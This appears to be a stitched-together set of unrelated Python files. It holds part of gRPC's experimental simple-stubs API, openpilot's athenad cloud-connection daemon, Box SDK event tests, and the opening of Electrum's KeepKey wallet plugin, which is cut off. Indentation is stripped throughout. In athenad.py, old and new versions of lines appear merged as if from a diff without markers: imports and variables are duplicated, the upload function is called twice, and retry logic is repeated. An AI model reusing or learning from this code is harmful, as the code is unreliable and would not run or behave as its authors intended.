exclusive with the `channel_credentials` option.
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to True.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised. If timeout is unspecified,
defaults to a timeout controlled by the
GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
unset, defaults to 60 seconds. Supply a value of None to indicate that
no timeout should be enforced.
metadata: Optional metadata to send to the server.
Returns:
An iterator of responses.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, insecure,
compression)
multicallable = channel.unary_stream(method, request_serializer,
response_deserializer)
wait_for_ready = wait_for_ready if wait_for_ready is not None else True
return multicallable(request,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def stream_unary(
request_iterator: Iterator[RequestType],
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
insecure: bool = False,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = _DEFAULT_TIMEOUT,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
"""Invokes a stream-unary RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request_iterator: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional :term:`serializer` for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional :term:`deserializer` for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
insecure: If True, specifies channel_credentials as
:term:`grpc.insecure_channel_credentials()`. This option is mutually
exclusive with the `channel_credentials` option.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to True.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised. If timeout is unspecified,
defaults to a timeout controlled by the
GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
unset, defaults to 60 seconds. Supply a value of None to indicate that
no timeout should be enforced.
metadata: Optional metadata to send to the server.
Returns:
The response to the RPC.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, insecure,
compression)
multicallable = channel.stream_unary(method, request_serializer,
response_deserializer)
wait_for_ready = wait_for_ready if wait_for_ready is not None else True
return multicallable(request_iterator,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def stream_stream(
request_iterator: Iterator[RequestType],
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
insecure: bool = False,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = _DEFAULT_TIMEOUT,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
"""Invokes a stream-stream RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request_iterator: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional :term:`serializer` for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional :term:`deserializer` for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
insecure: If True, specifies channel_credentials as
:term:`grpc.insecure_channel_credentials()`. This option is mutually
exclusive with the `channel_credentials` option.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to True.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised. If timeout is unspecified,
defaults to a timeout controlled by the
GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
unset, defaults to 60 seconds. Supply a value of None to indicate that
no timeout should be enforced.
metadata: Optional metadata to send to the server.
Returns:
An iterator of responses.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, insecure,
compression)
multicallable = channel.stream_stream(method, request_serializer,
response_deserializer)
wait_for_ready = wait_for_ready if wait_for_ready is not None else True
return multicallable(request_iterator,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
|
athenad.py | #!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
import tempfile
from collections import namedtuple
from functools import partial
from typing import Any
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
from selfdrive.statsd import STATS_DIR
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
cur_upload_items: Dict[int, Any] = {}
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event) -> None:
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
def upload_handler(end_event: threading.Event) -> None:
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
response = _do_upload(cur_upload_items[tid], cb)
if response.status_code not in (200, 201, 403, 412):
cloudlog.warning(f"athena.upload_handler.retry {response.status_code} {cur_upload_items[tid]}")
retry_upload(tid, end_event)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
retry_upload(tid, end_event)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
return uploadFilesToUrls([[fn, url, headers]])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
items = []
failed = []
for fn, url, headers in files_data:
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
failed.append(fn)
continue
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
failed.append(fn)
continue
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
items.append(item._asdict())
UploadQueueCache.cache(upload_queue)
resp = {"enqueued": len(items), "items": items}
if failed:
resp["failed"] = failed
return resp
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
if not isinstance(upload_id, list):
upload_id = [upload_id]
uploading_ids = {item.id for item in list(upload_queue.queue)}
cancelled_ids = uploading_ids.intersection(upload_id)
if len(cancelled_ids) == 0:
return 404
cancelled_uploads.update(cancelled_ids)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
while not end_event.is_set():
last_scan = 0
curr_scan = sec_since_boot()
try:
if curr_scan - last_scan > 10:
stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
if len(stat_filenames) > 0:
stat_path = os.path.join(STATS_DIR, stat_filenames[0])
with open(stat_path) as f:
jsonrpc = {
"method": "storeStats",
"params": {
"stats": f.read()
},
"jsonrpc": "2.0",
"id": stat_filenames[0]
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
os.remove(stat_path)
last_scan = curr_scan
except Exception:
cloudlog.exception("athena.stat_handler.exception")
time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = low_priority_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
test_events.py | # coding: utf-8
from __future__ import unicode_literals
from threading import Event, Thread
import pytest
import requests
from boxsdk.object.folder import FolderSyncState
@pytest.fixture
def box_events(box_client):
return box_client.events()
@pytest.fixture
def move_target(box_client):
return box_client.folder('0').create_subfolder('move target')
@pytest.fixture
def copy_target(box_client):
return box_client.folder('0').create_subfolder('copy target')
@pytest.fixture
def assert_event(box_events):
# pylint:disable=redefined-outer-name
def helper(get_item, event_type, stream_position=0):
item = get_item()
events = box_events.get_events(stream_position=stream_position)['entries']
assert len(events) == 1
event = events[0]
assert event['event_type'] == event_type
assert event['source']['name'] == item.name
assert event['source']['id'] == item.id
return helper
def test_get_long_poll_url(box_client):
options = box_client.events().get_long_poll_options()
with pytest.raises(requests.Timeout):
requests.get(options['url'], timeout=0.11)
def test_upload_causes_upload_event(uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file, 'ITEM_UPLOAD')
def test_create_folder_causes_create_event(created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder, 'ITEM_CREATE')
def test_move_file_causes_move_event(box_events, move_target, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_move_folder_causes_move_event(box_events, move_target, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_rename_file_causes_rename_event(box_events, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
updated_name = 'updated_{0}'.format(uploaded_file.name)
assert_event(lambda: uploaded_file.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_rename_folder_causes_rename_event(box_events, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
updated_name = 'updated_{0}'.format(created_subfolder.name)
assert_event(lambda: created_subfolder.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_copy_file_causes_copy_event(box_events, copy_target, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
def test_copy_folder_causes_copy_event(box_events, copy_target, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_file_causes_trash_event(box_events, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(uploaded_file.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_folder_causes_trash_event(box_events, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(created_subfolder.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.parametrize('sync_state,event_type', [
(FolderSyncState.IS_SYNCED, 'ITEM_SYNC'),
(FolderSyncState.NOT_SYNCED, 'ITEM_UNSYNC'),
])
def test_sync_folder_causes_sync_event(box_events, created_subfolder, assert_event, sync_state, event_type):
# pylint:disable=redefined-outer-name
assert_event(
lambda: created_subfolder.update_sync_state(sync_state.value),
event_type,
box_events.get_latest_stream_position(),
)
@pytest.fixture
def long_poll_generator(box_events, uploaded_file, request):
# pylint:disable=redefined-outer-name
generator = box_events.generate_events_with_long_polling(stream_position=0)
def long_poll():
for event in generator:
long_poll_thread.events.append(event)
long_poll_thread.event_ready.set()
if long_poll_thread.should_stop_polling:
return
long_poll_thread.consumed_events.wait()
long_poll_thread.consumed_events.clear()
long_poll_thread = Thread(target=long_poll)
long_poll_thread.should_stop_polling = False
long_poll_thread.events = []
long_poll_thread.event_ready = Event()
long_poll_thread.consumed_events = Event()
long_poll_thread.start()
def fin():
long_poll_thread.should_stop_polling = True
uploaded_file.delete()
long_poll_thread.event_ready.wait()
generator.close()
long_poll_thread.join()
request.addfinalizer(fin)
return long_poll_thread
def test_generate_events_with_long_polling(long_poll_generator, created_subfolder, uploaded_file):
# pylint:disable=redefined-outer-name
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
assert not long_poll_generator.event_ready.wait(timeout=0.01)
assert len(long_poll_generator.events) == 2
folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
assert folder_event['event_type'] == 'ITEM_CREATE'
assert file_event['event_type'] == 'ITEM_UPLOAD'
assert folder_event['source']['id'] == created_subfolder.id
assert file_event['source']['id'] == uploaded_file.id
assert folder_event['source']['name'] == created_subfolder.name
assert file_event['source']['name'] == uploaded_file.name
del long_poll_generator.events[:]
uploaded_file.rename('updated_{0}'.format(uploaded_file.name))
created_subfolder.rename('updated_{0}'.format(created_subfolder.name))
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
assert not long_poll_generator.event_ready.wait(timeout=0.01)
assert len(long_poll_generator.events) == 2
folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
assert folder_event['event_type'] == 'ITEM_RENAME'
assert file_event['event_type'] == 'ITEM_RENAME'
assert folder_event['source']['id'] == created_subfolder.id
assert file_event['source']['id'] == uploaded_file.id
assert folder_event['source']['name'] == 'updated_{0}'.format(created_subfolder.name)
assert file_event['source']['name'] == 'updated_{0}'.format(uploaded_file.name)
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
